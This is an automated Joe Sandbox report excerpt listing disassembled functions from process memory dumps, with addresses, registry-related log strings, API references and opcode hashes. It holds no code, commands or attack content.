Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 88fa3d5c166740637db26ab81a2390662024eb8359c00dedb32b98ad6b1dacd4
Instruction ID: aaa88d815066609962765ffa2d01a6c98af59f58518757c324c6ba717dcfa1a9
Opcode Fuzzy Hash: 88fa3d5c166740637db26ab81a2390662024eb8359c00dedb32b98ad6b1dacd4
Instruction Fuzzy Hash: 9AE09252A1D306C5F612BB00BC00279A214EB907C4FE040BADA5EC2690DE3CD9C9D325

Function 00007FF76A9060E6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF76A9060B5

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

registry_set_value, xrefs: 00007FF76A9060CE
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A9060D5

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 7611e847a032fba620ef0b7a275849f1579b208a3f448534bbccfe8909af6c6c
Instruction ID: aa0b8e5c5ba516f9fef2d3a09186f78eac9439b0b43d34fb33a82f256a4f4c7a
Opcode Fuzzy Hash: 7611e847a032fba620ef0b7a275849f1579b208a3f448534bbccfe8909af6c6c
Instruction Fuzzy Hash: 44E09252A1D306C5F612BF00FC00278A214EB907C4FE041BAEA5EC2590DE3CD9C9D315

Function 00007FF76A906096 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF76A9060B5

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

registry_set_value, xrefs: 00007FF76A9060CE
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A9060D5

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: d9efad4eec3e4561826b42dc29fea0b3c8f7b00078e471a97eecc6e0acabc104
Instruction ID: 667a03f2f5f39cef0d1b9f97e91358e1ea1baadcf813a1d8afdfe089de6b1b34
Opcode Fuzzy Hash: d9efad4eec3e4561826b42dc29fea0b3c8f7b00078e471a97eecc6e0acabc104
Instruction Fuzzy Hash: D3E09252A1D306C5F612BB00BC10279A214EB907C4FE040BADA5EC2690DE3CD9C9D315

Function 00007FFE115091A4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115091B5

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_set_value, xrefs: 00007FFE115091CE
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE115091D5

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 003e0d9aeac96177aff85e6c6f2d363db7d32dd77a7cc7ba419fedfd1ff473d5
Instruction ID: 4892740d0f18105319012f778dc14e6dd20ad9ba4bfb0362dc949dd316f7701f
Opcode Fuzzy Hash: 003e0d9aeac96177aff85e6c6f2d363db7d32dd77a7cc7ba419fedfd1ff473d5
Instruction Fuzzy Hash: B9E01252A0DA0781E712DF87FC5017D6219EB907B5F4441BAED0E426B4EE6CE589D341

Function 00007FFE11509196 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115091B5

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_set_value, xrefs: 00007FFE115091CE
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE115091D5

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 17379c9ec2d1977a3446e4f38aa0a4f923461d09dfbdf32103ca3b21a0116e48
Instruction ID: e87d908183b33602ba5458a147f998e3459e482af97abc1a99ab718f2bfd06d3
Opcode Fuzzy Hash: 17379c9ec2d1977a3446e4f38aa0a4f923461d09dfbdf32103ca3b21a0116e48
Instruction Fuzzy Hash: B5E01252A0DA0781E712DF47FC5007D2219EB907B5F4441BAED0E426B4EE6CE689D341

Function 00007FFE115091E6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115091B5

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_set_value, xrefs: 00007FFE115091CE
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE115091D5

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 6a0d8b9ed9287526be8abbf0c68c7214be50e319585fd108f03d42c9fc5ed7c7
Instruction ID: 958463a27e5e79baf1bca6b88ad5b0e17fd9f842eaed5f62206cf0388fe0662f
Opcode Fuzzy Hash: 6a0d8b9ed9287526be8abbf0c68c7214be50e319585fd108f03d42c9fc5ed7c7
Instruction Fuzzy Hash: 7DE01252A0DA0781E752DF47FC5007D2219EB907B5F4441B9ED4E425B4EE6CE589D301

Function 00007FFE11509105 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115091B5

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_set_value, xrefs: 00007FFE115091CE
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE115091D5

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: bdeea140171cc1683a9796964e62ff2d2451a16de524e313f8a0b9253efc434b
Instruction ID: 012c1d9cf68d18294d8fddc0590073a812bb505f38a3e548b48049a308e8784f
Opcode Fuzzy Hash: bdeea140171cc1683a9796964e62ff2d2451a16de524e313f8a0b9253efc434b
Instruction Fuzzy Hash: 8EE01252B0DA0781E712DF47FC5007D2219EB907B5F4441B9ED0E426B5EE6CE589D341

Function 00007FFE1150910F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE115091B5

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_set_value, xrefs: 00007FFE115091CE
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE115091D5

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 1001908780-3542721600
Opcode ID: 122e7ddee3e30f27d7bbd792767aa514d44f9f1e5c631c934f3cb3b63c8a4c98
Instruction ID: 188e56a49200b0c2e5d49f83da2741e2905cfb74c5d2b21e699d00328f62b6fb
Opcode Fuzzy Hash: 122e7ddee3e30f27d7bbd792767aa514d44f9f1e5c631c934f3cb3b63c8a4c98
Instruction Fuzzy Hash: 66E01252A0D90781E7129F47FC5017D2219EB907B5F4441B9ED0E425B4EE6CE589D341

Function 00007FF76A905D16 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF76A905D27

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A905D47
registry_del_value, xrefs: 00007FF76A905D40

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 5778dff27633abf6f9284b199295b57fd04a20718f86632072b5cffc28846bd8
Instruction ID: 1c98f93c2bcceaaeb6bfb9c65556652ea8c33b9af37538bb170d7507bcb3aa5b
Opcode Fuzzy Hash: 5778dff27633abf6f9284b199295b57fd04a20718f86632072b5cffc28846bd8
Instruction Fuzzy Hash: 24E04851A1C70AC5F5127B40FC50279E254FF507C4FF440BADD5DC26509D7CE985D220

Function 00007FF76A905D08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF76A905D27

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A905D47
registry_del_value, xrefs: 00007FF76A905D40

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: bcc82eacaf5ef66631614ae4d43a03e15e5a4950d8e37c4cfe0e681e030e1b2c
Instruction ID: 27ec2f401d7ce9a15256c85afd3de31fb77592ea2b93b36c8b7a975914986076
Opcode Fuzzy Hash: bcc82eacaf5ef66631614ae4d43a03e15e5a4950d8e37c4cfe0e681e030e1b2c
Instruction Fuzzy Hash: E4E04855A1C70AC5F5127B00FC50279E258FF507C4FF440BADD5DC26509D7CE985D221

Function 00007FF76A905C81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF76A905D27

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A905D47
registry_del_value, xrefs: 00007FF76A905D40

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 1b16ee5e167bf403b5bbe7c1ae002ea326f743cd9f9f8840ab329073f20d483e
Instruction ID: da0636a284e8db5b5b6124514817ad78fc61cd2601899213dcea0af50eead812
Opcode Fuzzy Hash: 1b16ee5e167bf403b5bbe7c1ae002ea326f743cd9f9f8840ab329073f20d483e
Instruction Fuzzy Hash: C3E01251A1C70AC5F5127B00FC50379A254FB507C4FF440B9D95DC25909D7CE989D220

Function 00007FF76A905C77 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF76A905D27

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A905D47
registry_del_value, xrefs: 00007FF76A905D40

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 6f147ffb47e58c4c8088de614b81800e083976b52401e58c0180332c14c091b8
Instruction ID: f9a881d54e7f5c1bcb31b0d95f0882adaa7da0bf2ee967acb54b21c0f253be5a
Opcode Fuzzy Hash: 6f147ffb47e58c4c8088de614b81800e083976b52401e58c0180332c14c091b8
Instruction Fuzzy Hash: 11E04851A1C70AC5F5127B00FC50279E254FF507C5FF441B9DD5DC2651AD7CE985D220

Function 00007FF76A905D58 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FF76A905D27

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

Strings

[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF76A905D47
registry_del_value, xrefs: 00007FF76A905D40

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 030c4325d880301d5f66904240bf79bf9503e9000fc6bd3554b7fddc451794d3
Instruction ID: b4c2c810f806d5b1045ac482f3aeabf12baf9e8a573de92e24e66878a52b1b1d
Opcode Fuzzy Hash: 030c4325d880301d5f66904240bf79bf9503e9000fc6bd3554b7fddc451794d3
Instruction Fuzzy Hash: A0E01265A1C70AC5F6527B00EC50279A254FB507C4FF441B9D99EC26509D7CE989D220

Function 00007FFE11508D81 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11508E27

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_del_value, xrefs: 00007FFE11508E40
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE11508E47

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: 8f1c3e1c36fa75ca42752ecfa09943136c116bdf83bda5ef7bdc699ee0ec67d8
Instruction ID: 712c5a07da8640bf950af00492985e83cdf17f4e299f378209c8db8fb2445be0
Opcode Fuzzy Hash: 8f1c3e1c36fa75ca42752ecfa09943136c116bdf83bda5ef7bdc699ee0ec67d8
Instruction Fuzzy Hash: 1DE01A62E4CE0781E721AB97FC405BD621CBB907A4F4441B9DE4E466B0DEACEA899241

Function 00007FFE11508D77 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11508E27

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_del_value, xrefs: 00007FFE11508E40
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE11508E47

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: cb5364c729a6b89dcd3c1e2df89601c7058d45c0027886060e1f100c81987347
Instruction ID: 3964f7d3d96947b8cfe745c941ccb9ea849faa4e96dfe11bc96828766e930b0e
Opcode Fuzzy Hash: cb5364c729a6b89dcd3c1e2df89601c7058d45c0027886060e1f100c81987347
Instruction Fuzzy Hash: 0FE09252E0CE0780E7119B47F80007D221CBB407A4F4401B9DE0E46670DE6CE984D241

Function 00007FFE11508E08 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11508E27

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

registry_del_value, xrefs: 00007FFE11508E40
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FFE11508E47

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Closefflushfwrite
String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 1001908780-1337547089
Opcode ID: bb2cdb2239e83db86e86385e393c09a4b8ba2f7024d00de8e2ddd93209775e27
Instruction ID: 82db621a8bf1dc5ed714e643c9bc18fa1fbfc6bd033d368686b3cf9421f69187
Opcode Fuzzy Hash: bb2cdb2239e83db86e86385e393c09a4b8ba2f7024d00de8e2ddd93209775e27
Instruction Fuzzy Hash: 59E01252E4CE0781E7119B57FC4047D621CFB507A4F4441B9DE4E46670DE6CEA85D241

Function 00007FFE11508E16 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32 ref: 00007FFE11508E27

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

